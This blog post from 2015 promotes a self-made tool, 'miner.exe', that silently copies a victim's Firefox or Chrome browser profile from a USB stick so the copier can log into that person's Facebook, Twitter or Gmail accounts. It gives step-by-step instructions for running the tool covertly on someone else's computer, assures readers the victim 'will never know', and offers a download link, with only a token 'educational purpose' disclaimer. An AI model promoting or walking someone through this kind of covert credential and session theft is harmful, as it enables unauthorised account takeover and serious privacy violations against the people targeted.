Friday, February 6, 2015

firefox and chrome user profile silent duplicater

sub warning()
    //this tool was created for educational purpose, use wisely
end sub


there is so many way to illegally gain access to someone online account (i.e. facebook, twitter, gmail), such as phishing, social engineering, brute force. but is it easy?

Protip : it's not easy

it take experience and patience to be able to do all of the above, you have to wait month, years, even milenia.
there is an easy way.
Lets assume you have temporary access to target computer(even if he/she is behind you watching). you can just run this utility i created, and in no time,

their account will be yours. 

Don't worry, they'll never know because

it run on silently on background

  1. Copy miner.exe to your flashdisk/portable harddrive
  2. plug into target PC
  3. run miner.exe
  4. wait until miner icon in system tray dissapear
  5. return to your PC
  6. overwrite your firefox or chrome user profile with his/her
  7. Open facebook/twitter/gmail
  8. ????
  9. Profit

Don't worry, the file been tested:

Download link :!VlNwRaYS!frqmvOwzlFO-4KvvdHuuOePeer0GFcQwOWtRcQHbS44

your feedback will be appreciated

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